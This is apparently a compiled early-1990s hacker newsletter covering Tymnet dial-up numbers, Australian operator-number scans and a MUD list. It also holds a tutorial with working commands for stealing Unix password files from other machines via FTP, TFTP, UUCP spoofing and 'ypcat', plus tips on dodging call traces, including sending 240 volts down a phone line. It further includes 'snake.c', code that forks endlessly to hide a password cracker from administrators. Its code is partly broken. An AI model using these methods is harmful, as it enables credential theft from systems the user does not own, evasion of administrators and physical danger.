Hadera                 3           (6) 332409      300B/1200B/2400
Haifa                  3           (4) 525421      300B/1200B/2400
                      3           (4) 673235      300B/1200B/2400
                      3           (4) 674203      300B/1200B/2400
                      3           (4) 674230      300B/1200B/2400
Herzeliya              3           (52) 545251     300B/1200B/2400
Jerusalem              3           (2) 242675      300B/1200B/2400
                      3           (2) 246363      300B/1200B/2400
                      3           (2) 248551      300B/1200B/2400
                      3           (2) 814396      300B/1200B/2400
Nahariya               3           (4) 825393      300B/1200B/2400
Netanya                3           (53) 348588     300B/1200B/2400
Rechovot               3           (8) 469799      300B/1200B/2400
Tel Aviv               3           (3) 203435      300B/1200B/2400
                      3           (3) 546-3837    300B/1200B/2400
                      3           (3) 751-2504    300B/1200B/2400
                      3           (3) 751-3799    300B/1200B/2400
                      3           (3) 752-0110    300B/1200B/2400
Tiberias               3           (6) 790274      300B/1200B/2400
Tzfat                  3           (6) 973282      300B/1200B/2400

Note: For log-on information please refer to BT Tymnet's on-line
      information service.

Note: When dialing inter-country to Israel, all phone numbers
      are preceded by dialing (972).

All Cities             2           809/924-9915    300B/1200B

Note: When dialing inter-country to Jamaica, the phone number
      is preceded by dialing (1). (If in USA/Canada, use above only.)

Seoul                  3           (2) 792-1455    1200

Note: Use domestic log-on procedure.

Note: When dialing inter-country to Korea, all phone numbers are
      preceded by dialing (82).

Curacao                3           (9) 239251      300/1200
Curacao/St. Maarten    3 (Local Only)  0251        300/1200

Note: When dialing inter-country to Netherland Antilles, the phone
      numbers is preceded by dialing (599).

Note: The Curacao/St. Maarten access location is a local access
      location only.  This location can not be used for inter-
      city or inter-country access.

All Cities             3           639-055         300B/1200B
                      3           636-727         2400

Note: When dialing inter-country to Panama, all phone numbers
      are preceded by dialing (507).

Lima                   4           (14) 240-478    1200

Note: When dialing inter-country to Peru, all phone numbers are
      preceded by dialing (51).


Mayaquez/Ponce         *           809/462-4213    300B/1200B
San Juan               *           809/725-1882    300B/1200B
                      *           809/725-4343    300B/1200B
                      *           809/725-3501    300/1200
                      *           809/725-4702    300/1200
                      *           809/724-6070    2400

Note: When dialing inter-country to Puerto Rico, all phone
      numbers are preceded by dialing (1). (If in USA/Canada, use
      above only.)
Manila                 2           (2) 819-1011    300
                      2           (2) 819-1009    300
                      2           (2) 819-1550    300
                      2           (2) 815-1553    300B/1200B
                      2           (2) 815-1555    300B/1200B
                      2           (2) 817-1791    300B/1200B
                      2           (2) 817-1581    300B/1200B
                      2           (2) 817-1796    300B/1200B
                      2           (2) 817-8811    300
                      2           (2) 521-7901    300

Note: When dialing inter-country to the Philippines, all phone
      numbers are preceded by dialing (63).

Riyadh                 5           (1) 4658803     1200
                      5           (1) 4631038     2400
Jeddah                 5           (2) 6690708     1200
                      5           (2) 6691377     2400
Alkobar                5           (3) 8981025     1200

Note: For log-on information please refer to BT Tymnet's on-line
      information service.

Note: When dialing inter-country to Saudi Arabia, all phone
      numbers are preceded by dialing (966).

All Cities             2           809/627-0854    300/1200
                      2           809/627-0855    300/1200

Note: When dialing inter-country to Trinidad and Tobago, all phone
      numbers are preceded by dialing (1). (If in USA/Canada, use
      above only.)

UNITED KINGDOM (British Telecom PSS)
Aberdeen               1           (224) 210701
Belfast                1           (232) 331284
Birmingham             1           (21) 633-3474
Bristol                1           (272) 211545
Cambridge              1           (223) 460127
Cardiff                1           (222) 344184
Chelmsford             1           (245) 491323
Edinburgh              1           (31) 313-2137
Exeter                 1           (392) 421565
Glasgow                1           (41) 204-1722
Hastings               1           (424) 722788
Ipswich                1           (473) 210212
Kings Lynn             1           (553) 691090
Leamington             1           (926) 451419
Leeds                  1           (532) 440024
Liverpool              1           (51) 255-0230
London                 1           (71) 490-2200
Luton                  1           (582) 481818
Manchester             1           (61) 834-5533
Newcastle              1           (91) 261-6858
Northhampton           1           (604) 33395
Nottingham             1           (602) 506005
Oxford                 1           (865) 798949
Plymouth               1           (752) 603302
Reading                1           (734) 500722
Southampton            1           (703) 634530

Note: When dialing inter-country to the United Kingdom, all phone
      number are preceded by dialing (44).  The above access
      numbers will support 300/1200/2400 bps.

The above numbers support

St. Thomas             3           809/774-7099    300B
                      3           809/776-7084    1200B

Note: When dialing inter-country to the Virgin Islands, all phone
      number are preceded by dialing (1). (If in USA/Canada, use
      above only.)


TYMUSA Access Procedures

The following log-on procedures pertain to the countries listed
on the previous pages:

   First, dial up the access number provided for the specific
   country from the preceeding list.

   When you have established a network connection you will receive
   the following network prompt:

             Please log in:

   After the prompt, type the following:

             Please log in: TYMUSA

   This will establish the link to TYMNET.  You will then receive
   another prompt from TYMNET at which time you should enter your
   username as in the example below:

             Please log in: YOURUSERNAME


Costa Rica
French Antilles
French Guiana
Ivory Coast
New Caledonia
New Zealand
South Africa
United Arab Emirates


      <>                              <>
      <> Grabbing Unix Password Files <>
      <>                              <>
      <>              By              <>
      <>                              <>
      <>         Prime Suspect        <>
      <>                              <>

       This article outlines several ways of grabbing the Unix password file,
"/etc/passwd", obviously assuming you dont have an account on the remote
machine (otherwise you wouldn't need this file :). Most of the methods you
will probably have heard of, or used, but there's a couple of not so well
known methods by which the passwd file can be obtained. All methods, however,
require some degree of networking between the host and target machines, either
UUCP or TCP/IP based.

                        FTP - File Transfer Program. 

       As the name suggests, FTP is a file transferring program, which works
over the TCP/IP networking protocol. Look up the manual pages ['man ftp'] for
more information on how to operate it. Using FTP to grab the passwd file of
your target will not succeed, unless the remote machine is running an
anonymous FTP service, and the system administrators of the target machine are
exceedingly stupid: You'd be surprised how many stupid/ignorant operators
there are. After connecting to the target site with the FTP program, login
with username "ftp" or "anonymous". The password can be anything except null.
(ie must be a word). Now then, when you do a "dir", the remote site will tell
you you're in the "/" directory - the root directory. However, you'll actually
be in a directory such as "/usr/ftp". The reason for this is that when you log
in as "anonymous", FTP calls the routine "chroot", which changes the root
directory from "/", the real root directory, to (say) "/usr/ftp", so that from
the FTP server, what appears as "/" is actually "/usr/ftp".

[ editor ]

A collection of public ftp sites and all their files is maintaned by
"quiche.cs.mgcill.ca". Login as "archie" and do the following...

Archie>	set pager			(output through less)
Archie>	set sortby size			(largest first)
Archie>	set search exact		(exact file matching)
Archie>	set mailto you@your.domain	(send results to...)
Archie>	prog passwd			(do it for passwd)

  After a while you will get the first page of the putput. Press "q" (to quit
less) then...

Archie>	mail				(mail the results to $mailto)

  Do not close the connection untill "archie" tells you it has FINNISHED
mailing the results.

[ back to Prime... ]

       Most anonymous FTP sites will have in their FTP root directory,
subdirectories called "bin", "etc", and "pub" at the very least. In the "etc"
directory will generally be "passwd", "group", and mabye "motd", which is
displayed when you log in to the FTP account. The passwd and group files are
similar to those found in the true /etc directory. This is where operator
stupidity comes in. It is up to the operator to transfer /etc/passwd and
/etc/group to ~ftp/etc/passwd & group. The majority of operators realize what
a security risk it would be to leave their system's passwd file unchanged, in
a position where any "anonymous" user, not from their site could d/load &
crack it. So, those operators alert to this problem, edit the ~ftp/etc/passwd,
making it only two or three lines, with no passwords (which most sites do)
such as:

       ftp:*:10:21:Anonymous Ftp login:/usr/ftp:/bin/true

  Some sites will have the entire passwd file the same as the true passwd file,
with just the password field changed to "*" or some non-password character,
giving you the list of users, without the crackable password field. While this
is slightly more useful in that you have a list of system users, you still
can't feed it through a passwd cracker (err...well you can, but it won't
achieve anything). And some sites, just copy /etc/passwd to ~ftp/etc/passwd,
making no modifications. This is the situation you're after. Download this and
off you go. [ Incidently, on many of the VAX/VMS systems, where logging in as
DECNET/DECNET earned a "Not Authorized to log in from this source" error, you
can instead, FTP into a vax with DECNET/DECNET, and from there download the
rightslist, but seeing as this article is concerned with Unix, i'll go into it
no further. ]

                    TFTP - Trivial File Transfer Program.

       TFTP functions in much the same way as FTP, except no logging-in
procedure is required ['man tftp' for more info]. While the following has been
patched on many systems, including most latest release versions (such as SunOS
4.1), you can be assured it will work on at least one computer at a large
site.  Susceptable systems include SunOS  <= 4.0, Silicon Graphics Iris,
Xenix, RISC/OS, and Pyramid's OSx. Whilst very easy to plug, this hole is
often over looked. What should happen, is that the TFTP server (on the remote
machine) should, like FTP, do a "chroot", so as to keep deviants away from the
system passwd file, however, this only occurrs in the patched versions, and
un-patched systems will let you download any world readable file, provided you
know its pathname. Obviously, you know the passwd file's path. When grabbing
the target's passwd file with TFTP, turn packet tracing ON. This lets you see
whether a passwd grab has been successful, or whether the target system has
been patched, and terminate the attempt without having to wait the entire
time-out period. Some of the more cunning sites patch the TFTP server
(basically, all the patch does is chroot to another directory) to send a bogus
passwd file. Test for this by trying to get other files too, such as
/etc/hosts, or /etc/remote.

                         UUCP - Unix to Unix Copy #1

       The UUCP program is a program to copy files from one Unix machine to
another. Once again, using UUCP to grab a passwd file relies on Operator
stupidity, and also in this case, the remote operator will need to posess a
reasonably high degree of un-attentivness towards his/her system. When a sysop
notices that someone is trying to get their passwd file, they'll complain to
your host's administrator, and accounts start dying. Basically, to grab a
passwd file with UUCP, use:

sh:    uucp target!/etc/passwd   yoursystem!/usr/spool/uucppublic/filename
csh:   uucp target\!/etc/passwd   yoursystem\!/usr/spool/uucppublic/filename

NOTE the "\" before the "!" in csh.

       The filename on the local system doesnt have to be the one suggested,
but the directory into which you want it copied must be world writable, or at
least writable by uucp. After issuing the above command, wait for your system
to connect to the remote host and do its stuff.

                         UUCP - Unix to Unix Copy #2

       If you have a root account on, say a local Xenix system, and you want
the passwd file to crack of another Xenix system, but the two are not directly
linked, and you dont know the path of hosts inbetween, it is possible to set
up the system on which you have root to call the target system, pretending its
the real UUCP polling machine, and get the passwd file that way. Most Xenix
systems owned by lawyers or medical practicioners or whatever on single line
dialup will have the uucp account set with no password. Thus its a matter of
knowing the remote site's system name, dialup number, and possibly their uucp
polling site. The targets name can be aquired from the login string, eg)

       Where the name before the exclamation mark (!) is the system name, in
this case "xenix386". Or, if its not displayed at login, try logging in as
"uucp", eg)

Login: uucp


       The target's name is important, as if you tell your system to connect
to "unknown", and it instead finds "xenix386" at the other end, it'll return
an error, and the connection will be killed. Firstly, tell your system where
to call. Modify the file "L.sys" or "Systems" in either the "/usr/lib/uucp" or
"/etc/uucp" directory. Add a line similar to the following:

xenix386 any ACU 2400 8942815 ogin:-@-ogin: uucp

or if the uucp account is password protected:

xenix386 any ACU 2400 8942815 ogin:-@-ogin: uucp word:password

  Where you should substitute "xenix386" for the target's systems name, "2400"
for its maximum speed (taking into consideration the local system's speed
too), "8942815" for its dialup, and "password" for the uucp passwd, if set.

   Next, you'll have to change the local system's name to one the target
will recognise. This is a problem if you have absolutely no idea as to the
name of the remote computer's polling site (the system it legitemately
converses with). Some systems will accept their own name. In Melbourne, a
major poll site is "munnari", so you could try that. Anyway, the file
"/etc/systemid" on Xenix's contains the hostname of the local site, so edit
this to whatever you like, just remember to change it back to the original
name when you're finished, coz the operator might get slightly suspicious

       Anyway, issue the UUCP command to grab the passwd file (as above). If
the local system only has one dialup line, and it uses this also for dialing
out, then it may be easier to write a script such as:

sleep 120
uucp remote!/etc/passwd local!/usr/spool/uucppublic/rpasswd

 Then run the script in the background, and log out. Two minutes later, your
local site will dialup the remote. And attempt to grab the password file.

[ This can be done using the IBM PC UUCP and I have heard there is an Amiga
 version also - Editor ]

               YP - Yellow Pages [ also called NIS - Editor ]

       The Yellow Pages is a service by which several computers, which would
be used by the same users, share the same password/hosts/aliases and various
other files in order to save both space and hassle. When called upon, yellow
pages access the server system, which is assigned to host the various files,
to receive the requested file.

       If a system is running yellow pages, the command "ypcat passwd" would
print the network's passwd file to your screen. All systems hanging on that
particular server are assigned the same domain name. The domainname for a
system you have access to can be shown with the command "domainname", and will
return a string something like:


       The wonderfull thing about sites using the Yellow Pages, is that you
can grab passwords from other domains within that site, by specifying the "-d"
option, then the domain. eg)

       ypcat -d otherdomain passwd [ "ypcat hosts" or "ypcat -d otherdomian"
     will tell you what systems the yp passwd
     list is (probably) activve on - Editor ]

       Would get you the passwd file of the "otherdomain". The only problem
with this method is that domainnames have no set format, so that guessing the
domainname can get difficult. Sometimes, the domainname will be specified when
connecting to the SMTP port. This method, however, is limited to domains
within the one site, so that if you're on The University of Newcastle, and
wanted the passwd file to a domain at the Unoversity of Western Australia,
then you wouldnt be able to grab the passwd list using 'ypcat'.

[ Prime Suspect has not finished this file yet, but I became sick of hassling
 him about it. Prime says he shall have the rest of it ready for the next
 edition - Editor ]


                           -  Tracing Information  -


                              -  Introduction  -

One of the biggest worry for a computer hacker is being traced  on  a  computer
system. This isn't really a problem for phreakers as the routing information is
lost during the phreaking of a call. The best  telecom  could  do  is  get  the
exchange the call is coming from and log  for  particle  patterns  on  the  MFC
signalling equipment. (This  is  for  Non-AXE  exchanges.)  If  they  have  the
equipment to do this I don't really know (doubtful) but it could be done.  I've
yet to find someone phreak with any method TWICE from an  AXE.  But  there  are
bugs around. One possible area being routing from AXE A to AXE B via a  non-AXE
tandem. But thats another file. Also hacking from an  AXE  is  very  unsafe  as
everything you do is logged and thus on record for all to see. I've heard  that
it takes a second to trace a number on an AXE from another AXE. However alot of
Branch Exchanges don't have Junction Techs around 24 hours a day and so a trace
might take a little longer. Like after a weekend or public holiday.

                               How Traces Work

The reason why people get a trace put on their line is for  prank  calls.  This
includes computer hackers hacking their computer system.  Thats  is  why  techs
call it Malicious call tracing or last-party-release.
This is how it works.

YOU-------ring------->THEM (Say a computer network)

At this point you have not been traced. A link back to your line is  made  once
the call is answered. This is your tracing trunk.


At this point you may have  started  to  do  something  which  has  caused  the
operator to install a line holding software on his system. You are about to  be

YOU-------hang-up---->LINE FREE

A Clear-forward signal is sent to you but no  Clear-back  to  them.  This  only
happens when you hang up. A time supervision circuit is activated and after  90
second a Malicious call alarm is lit-up in the Maintenance Control Room.  If  a
tech is on hand he will begin the trace from their line back to  you.  All  the
while you don't know a thing about it as your  line  is  free  to  use  due  to
tracing equipment sending the Clear-forward signal.

                            Setting Up For A Trace
Now the thing to know about a trace is that they do not start any alarms  until
90 seconds after you hang-up. They must also must keep their line off  hook  to
hold the tracing trunk to your line. So to check if you have been traced set up
your modem as follows.

ATS10=255  Ignore the carrier status. Stay off hook.
ATM2       Speaker always on.

This should allow you to stay on line once the other  modem  has  disabled  the
carrier appearing to have disconnected the line. When the other  hosts  carrier
is lost most smart modems will hang-up thus  triggering  the  trace  equipment.
Which is what we don't want. Now to make sure that you  have  not  been  traced
have in place a phone that you can take off hook  on  the  same  line  as  your
modem. Now switch off your modem which should still have it's carrier  sounding
away and wait about 90 seconds. If after 90 seconds the hosts  line  has  timed
out you have not been traced. If after more then 90 seconds the line appears to
be still connected then start to worry a little bit. The hosts system will have
done the following via software.

Disconnect Carrier
ATH1       Stay off hook.

                            Getting Rid Of A Trace

Now the following are theories only on how to break a trace. So i'll describe a
few method you could try but i can't say that any will work if at all.

First of all if you have phreaked a call to a  computer  system  what  are  you
worried about? If you haven't used a method everyone else  is  using  like  the
89X-XXXX exchanges then you have a very good chance of not being traced to your
home exchange. I should mention that telecom is spending $25 million  to  catch
phreakers using my old methods. I also hear that the list is getting bigger  by
the day and i'm still not on it. Maybe those on the list don't know  what  they
are doing. (Ok i've had my bitch about lamer phreakers who wouldn't  know  what
DTMF or TASI means.)

One method is phreak a call on another line using a STD trunk and blast 83Hz or
3825Hz for 600ms down the line. This is a Clear-back signal on STD trunks. As a
trace doesn't Clear-back this could fix it. It would be best to  try  the  this
method from a phone box or safe friends line and leave  your  home  line  still

Ok now the simplest method would have to be ringing up the fault operator  with
your traced line still connected to the hosts system. Now  tell  her  the  host
system number has been faulty and that you need to get through. Now a Malicious
trace is routed the same way as line interception. So when the  Fault  Operator
does the interception on that line she also  has  to  remove  the  interception
setting from the line this may cause the trace to be disconnected. An Emergency
break on the line also has a  Clear-back  signal  in  it's  routing  the  Fault
Operator can also perform this function.

Now try the above methods on your home line. Phreaked if possible, if  you  are
unabled to phreak any calls (you wouldn't be in this trouble if you could) then
care should be taken when talking to the Fault Operator as she might have notes
on her screen saying that the line has a trace on it.  So  before  calling  the
Operator try this. Call 199 which is the ring back number. When you  call  this
number the voltage on the line is reversed about. Do a pulse 2 and  you  should
disconnect from the exchange for a few minutes. The tracing  trunk  maybe  lost
from the reversed voltage or the exchange disconnect.  Then finally  disconnect
your whole phone system from the phone line for an  hour  or  two  or  if  your
really in a panic plug 240 volts down the phone line and try blow  the  tracing
system out of the network.

As i've said before these methods are only theory and if they  work  or  not  i
don't know. So if it gets you out of trouble then at least it's  worth  a  try.
Except say the 240 volts trick. But then 240 might be the only thing that could
work so hopefully you'll never need to use it.


                       -> Diode's Internet Mud-List -<
                                fourth edition

                             [ Obtained by Hvee ]

  I have labored to make this the most complete Mud list available on the
Internet, and I depend on other people telling me of new muds, dead muds,
changed muds, etc. If you see _any_ inaccurate information _anywhere_, PLEASE
tell me! (I can be reached by: s-hofmann@uiuc.edu) The completeness and accuracy
of this list depends on you. As of 7/2/91, I was able to log onto all of these
muds. And now, without further ado.....

74 Muds total.

NAME           | HostName                   | IP Address    |Port#| Footnote
DragonMUD       |naucse.cse.nau.edu          |   | 4201| 1
TinyWORLD       |rillona.ssc.gov             |   | 6250|
QuartzPARADISE  |quartz.rutgers.edu          |      | 9999| 3
ApexMUD         |apex.yorku.ca               |     | 4201| 

Pegasus         |l_cae05.icaen.uiowa.edu     |  | 2001| 16
CaveMUCK        |piggy.ucsb.edu              |  | 2000| 18
Lawries MUD     |cserve.cs.adfa.oz.au        |   | 4201| 
FluxMUCK        |next2.acs.muohio.edu        |    | 2112| 
MuckMUCK        |ferkel.ucsb.edu             |  | 3000| 
Time Traveller  |impending.ucsd.edu          |  | 4201| 
TinyHORNS       |bashful.cc.utexas.edu       |   | 4201|
FurryMUCK       |skid.ps.uci.edu             |  | 2323| 
MbongoMUCK      |?                           | | 4201|

                                 Tiny MUSHs
TinyTIM         |grape.ecs.clarkson.edu      | | 6250| 
PernMUSH        |leland.stanford.edu         |     | 4201| 6 
Dungeon         |?                           |  | 8888| 7 
Global MUSH     |wst3.colby.edu              |  | 4201| 8 
TinyCWRU        |caisr2.caisr.cwru.edu       |?              | 4201| 
RutMUSH         |aulos.rutgers.edu           |     | 4201|

                                Teeny MUDs
(Evil!)Mud      |fido.econ.arizona.edu       |  | 4201|

                                 Tiny MUSEs                      
MicroMUSE       |chezmoto.ai.mit.edu         |    | 4201| 
FinalMUSE       |august.ai.mit.edu           |   | 5150| 9
Star Trek MUSE  |ecsgate.uncecs.edu          |  | 1701| 
Eden            |henson.cc.wwu.edu           | | 4201| 

Lambda MOO      |lambda.parc.xerox.com       |    | 8888| 14

Genesis         |milou.cd.chalmers.se        |    | 2000| 10
BATMUD          |cc.tut.fi                   |  | 2002| 
NannyMUD        |mud.lysator.liu.se          | | 2000| 
(alternate)     |nanny.lysator.liu.se        | | 2000|
(alternate)     |emilia.lysator.liu.se       | | 2000|
(alternate)     |laila.lysator.liu.se        | | 2000|
HERO MUD        |warhol.art.umich.edu        | | 2000| 
LPSwat          |pompeii.cs.swarthmore.edu   |    | 2020| 
Underground LP  |?                           |    | 2001| 
KoBra           |ohrid.cca.vu.nl             |   | 8888| 17
AfterHours MUD  |henson.cc.wwu.edu           | | 2000| 
Shadow World    |elof.iit.edu                |  | 2112| 
World of Mizar  |estel.docs.uu.se            |    | 9000| 
Deep Trouble    |krikand.iesd.auc.dk         |  | 4242| 
Nightfall |taurus.tat.physik.uni-tuebingen.de|   | 4242| 
Ghost MUD       |beowulf.acc.stolaf.edu      |  | 6715| 
Viking MUD      |avx01.ifi.unit.no           |  | 2001| 
Krynn           |hp0.cs.uiuc.edu             |?              | 2190| 
Igor MUD        |alfa.me.chalmers.se         |    | 1701| 
Overdrive       |cadesm15.eng.utah.edu       |   | 5195| 
Sceptre of Goth |bedrock.cs.umd.edu          |  | 2222| 
TUBMUD          |para.cs.tu-berlin.de        |  | 7680| 
Nuage           |fifi.univ-lyon1.fr          | | 2000| 
Terrapin        |bessel.umd.edu              |  | 2000| 
Darker Realms   |worf.tamu.edu               | | 2000| 
SabreMud        |lonestar.utsa.edu           |  | 2001| 
Marches of Antan|chem.ucsd.edu               |   | 2000| 
Revelations     |kaja.gi.alaska.edu          | | 2000|
Round Table     |loligo.cc.fsu.edu           |   | 2222|
Valkyrie Prime  |henson.cc.wwu.edu           | | 2777|
Windy Mud       |breeze.fit.qut.edu.au       |   | 2000|
Full Moon       |honeydew.cc.wwu.edu         | | 4096| 
ParanoiaMUD     |paranoia.uafcs.alaska.edu   |  | 6715| 20
Wings/Dartmouth |?                           |  | 2000|

Dagon II        |dagon.acc.stolaf.edu        |  | 6715| 19
UnMUD           |loligo.cc.fsu.edu           |   | 6715| 13
Ulrik           |ulrik.uio.no                |    | 6715|
The Underground |hal.gnu.ai.mit.edu          |   | 6715|
LadLand         |vipunen.hut.fi              | | 6715|
               |hal.gnu.ai.mit.edu          |   | 4000| 
               |bigboy.cis.temple.edu       |   | 4000| 
               |alfa.me.chalmers.se         |    | 4000| 
               |elof.iit.edu                |  | 4000| 
AlexMUD         |alex.stacken.kth.se         |  | 4000| 
               |sequent.berkeley.edu        |  | 4000| 
Mudde Pathetique|swan.svl.cdc.com            |   | 4000| 
The Phaze       |keppi.jyu.fi                |   | 4000| 
               |copper.denver.colorado.edu  |   | 4000| 
GrimneMUD       |?                           |  | 4000|

                                                                    Type  Foot
DUM II          |legolas.cs.umu.se           |  | 2001| DUM  | 21
GooLand         |rickers.cis.uoguelph.ca     | | 6715| YAMUD|

                           Appendix 1: Footnotes

1: You must register with jjt@naucse.cse.nau.edu or jopsy@naucse.cse.nau.edu
  to play.

3: You must register with bbs@quartz.rutgers.edu to play. No pennies required.

4: The software version is Tim 1.0

5: The software version is Squea 1.0

6: The software version is Pern 1.0.3

7: The software version is Pern 1.0.2

8: The software version is Micro 1.0

9: You must register with ova@ai.mit.edu to play.

10: This is the original LP mud. It is always the most recent software 
   (currently 3.0.18).

11: The mudlib on this LP is a very heavily rewritten 2.4.5. It has 
   character building similar to Dikus.

12: To play here, telnet and login as 'mud'.

13: The software version is arkmud.

14: This was the first LamdbaMOO. Lambda was the creator.

15: To play, register with jennifer@valkyrie.ecn.uoknor.edu

16: You need to register with gamesmgr@icaen.uiowa.edu to play.

17: The mudlib has been rewritten to support a science fiction theme.

18: You must register with jingoro@piggy.ucsb.edu to play.

19: This mud is only open on weekends and 6PM-Midnight (I think it's CST.)

20: You need to register with lpmud@paranoia.uafcs.alaska.edu to play.

21: DUM II is open from 1900 to 700 CET weekdays and all day weekends.

             Appendix 2:  Sources for MUD games and accessories

       This is a listing where the currently known sources to MUD games and
their accessories can be found via anonymous FTP (login: anonymous;
password: your email address)

      *variety*      *location*                     *directory*

      TinyMUD         lancelot.avalon.cs.cmu.edu     /pub 
                      belch.berkeley.edu             /pub/tinymud
                      ucbvax.berkeley.edu            /pub/games/tinymud

      TinyMUCK        belch.berkeley.edu             /pub/tinymuck 
                      lancelot.avalon.cs.cmu.edu     /pub
      TinyMUSH        belch.berkeley.edu             /pub/tinymush 

      TeenyMUD        snow.white.toronto.edu         /pub/muds/teenymud
                      belch.berkeley.edu             /pub/mud_misc

      AberMUD         belch.berkeley.edu             /pub/abermud

      LPMUD           belch.berkeley.edu             /pub/lpmud
                      ucbvax.berkeley.edu            /pub/games/lpmud
                      iesd.auc.dk                    /pub/lpmud
                      nanny.lysator.liu.se           /pub/lpmud
                      dante.cs.uiuc.edu              /pub/lpmud
                      calvin.nmsu.edu                /pub/mud
                      alcazar.cd.chalmers.se         /pub
                        Note: this machine always has the most recent version,
                              as it is the machine lars works on.

      UberMUD         belch.berkeley.edu             /pub/ubermud
                      snow.white.toronto.edu         /pub/muds/uber
      DikuMUD         belch.berkeley.edu             /pub/dikumud

      MOO             belch.berkeley.edu             /pub/moo,

      UnterMUD        decuac.dec.com                 /pub

    FTP daemon patch  nanny.lysator.liu.se           /pub/lpmud/ftpd
        for LPMud

      MUD Clients     belch.berkeley.edu             /pub/mud_clients
                      valkyrie.ecn.uoknor.edu        /pub/mud_clients
                      nanny.lysator.liu.se           /pub/lpmud/clients
                      lancelot.avalon.cs.cmu.edu     /pub
                      jaguar.cs.wisc.edu             /pub/tinytalk
                      calvin.nmsu.edu                /pub/mud
                      decuac.dec.com                 /pub/mudclients

      LPC             nanny.lysator.liu.se           /pub/lpmud/lpc

      Robots          belch.berkeley.edu             /pub/mud_robots

                 Appendix 3:  Frequently Asked Questions (FAQ)

  MUD stands for Multi-User Domain, or Multi-User Dungeon (historically). To
connect to all muds aside from some AberMUDs, on Un*x systems, enter: 'telnet
<name of the computer the mud resides on -or- the IP number> <port - that
four-digit number>'; On VMS systems, enter: 'telnet <computer name>/port=<port
number>'. For some AberMUDs, telnet without the port number and login using
the provided login name.

  Then comes entering the game proper. On LPmuds, at the 'Name:' (or some
synonym) prompt, enter the name you would like to go by. It will then print
'New character' if this is your first time. Then you will be asked for a 
password. It will ask for the password again the first time, for verification
purposes. From there, you are now a full-fledged player! For further help,
type in 'help' or ask other players. Wizards (people who have conquered the
game, and thus are able to change their title and alignment) should know 
just about everything about the game, and be happy to help a newbie 
*temporarily*. They will not babysit anyone, nor help out with experiance,
money, or other material things.

 On tinyMUD-style games (tinyMUD, tinyMUSH, tinyMUCK, MOO, TeenyMUD, etc.)
use 'create <player> <password>', and from there ask other players for help.
Some things, however. For all future logins, use 'connect <player> <password>',
to get a list of all players present type in 'WHO', and the same disclaimers
apply to TinyWizards as do to LP Wizards.

  On DikuMUDs, after an LP-style login, you need to select 'Enter the game'
from the entry menu, and also select a character class (thief, warrior, cleric,
etc.). The game plays more like Dungeons&Dragons than other muds. To get
started, find a group of players, and ask to join.

  For any other questions/problems you might have, _ask other players_. A more
comprehensive FAQ sheet is posted every so often to the newsgroup 
rec.games.mud; questions are also answered there. And, above all, have fun!

Well, this concludes the fourth edition of the mud-list. Please remember to
eat and sleep every so often, and enjoy !


     ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
     ~ Sea snake's have forked tounges ~
     ~                                 ~
     ~                By               ~
     ~                                 ~
     ~        The Chthonic Hvee        ~
     ~                                 ~
     ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

 But a few weeks ago, I came accross a system with CPU limiting control,
which is where Hvee got the idea for this from. As it turned out,
dissabling CPU limiting is rather easy, just  call "signal(SIGXCPU,SIG_IGN);"
But the way I reasoned it, why not just create a child process the same
as the parent proccess, then kill the parent? Indeed that is what the
very program does (over tones of self-important 1950's U.S disarster films
rumble in the background of my mind's eye).

 I have put in a few other signal controls as well, which means...

The process automaticly detaches it self from the shell.
The process effectivly "nohups" itself.

This means that you have an effective priority equal to that of the
shell. ("nohup" and "&" both take the priority down (or up in Unix terms)).

  Because we are forking randomly once every 1 to 30 seconds, when the SU
does a "top" or "ps" it is going to look like we have used very little
CPU time. On a large site, you may want to increase the forking speed,
so that you are forking once or more every second. Doing that will cause the
PID to change so fast that the SU will need to write a specific program, or
reboot the machine in order to kill it off - and on a large site the SU will
be very reluctant to do this, especially if you call your process "csh",
"telnet" or some other sheepish name.

  To merge this program with whatever CPU intensive program you want
(password cracker, I assume) just...

#include "snake.c"
/* and then within main() */

Note:	Cops does't seems to like this, It dies on the second generation, and
I'm not sure why. I think it is because the STDIN/STDOUT links are getting
chopped. Getting cops to write it's output directly to a file will propably fix
this. I will inform you next edition of the fix.

----------------------------------> Cut Here <---------------------------------
/* snake.c (c) 1991 TCH */

#include <signal.h>
void *sethand();
void *handler();

void *
sethand() {

       signal(SIGALRM,handler);	/* The pointer to our routine */
       signal(SIGQUIT,SIG_IGN);	/* Ignore termination signals */
       alarm(1);			/* Put us into the background */


void *
handler()	/* When then timer countdown reaches zero */

       if (fork()!=0) exit();	/* If we are the parent then die */
/* remove the exit() for some rather
                                  interesting results... ;-) */
       alarm(rand()/1024);	/* child lives, spawn in 1-32 seconds */
----------------------------------> Cut Here <---------------------------------


                       /\ Australian, 15XXX Sprint /\
                       /\                          /\
                       /\            By            /\
                       /\                          /\
                       /\      Trax & Crocket      /\

                              (Incomplete File)

                    Operator to operator numbers. (Direct)

                        Scan done by Trax and Crocket

                                  Scan 15XXX

      '1100 faults' means the operator said "telephone service" (public)

[ See also Bigfoot's OIC list in this edition - Editor ]

15200 Darwin
15203 ??? some telephone exchange
15206 "Good morning, this is Alice Springs, do you wish Darwin??"
15220 1100 faults (somewhere in NSW)
15223 1100 faults (Sydney)
15227 Woolongong
15233 1100 faults (Penrith)
15234 Directory assistance (Sydney)
15235 Engaged signal..(the engaged signals are like congestion)
15236 Engaged signal..
15237 Woolongong
15239 Woolongong
15242 Engaged signal..
15243 1100 faults (Newcastle)
15244 1100 faults (Newcastle)
15247 Newcastle
15250 Engaged signal..
15253 1100 faults (Canberra)
15263 Newcastle
15267 1100 faults (Lismore)
15268 Engaged signal..
15270 Darwin
15271 1100 faults (Canberra)
15272 1100 faults (Canberra)
15273 1100 faults (Canberra)
15274 "Good morning this is Alice Springs, do you wish Darwin??"
15278 Alice Springs
15279 "Number please"   ?????????????????? definite exchange level.
15280 1100 faults (Newcastle)
15281 Engaged signal..
15282 Engaged signal..
15283 Newcastle
15284 Engaged signal..
15285 Engaged signal..
15286 Engaged signal..
15288 it rang, try again later.
15289 1100 faults (????)  - exchange level
15291 1100 faults (????)      \
15292 Engaged signal..         call at exchange level
15293 1100 faults (????)     _/
15295 couldnt hear the name try again later, exchange level.
15296 Engaged signal..
15300 Hobart
15301 Hobart
15302 Hobart
15303 Hobart
15307 Hobart
15323 1100 faults (Melbourne)
15326 Telecom business service centre
15331 Melbourne directory assistance
15332 Business service
15333 1100 faults (Melbourne)
15343 "hold the line please" then hung up.
15353 it rang, try again later. (from exchange level)[rung like 343]
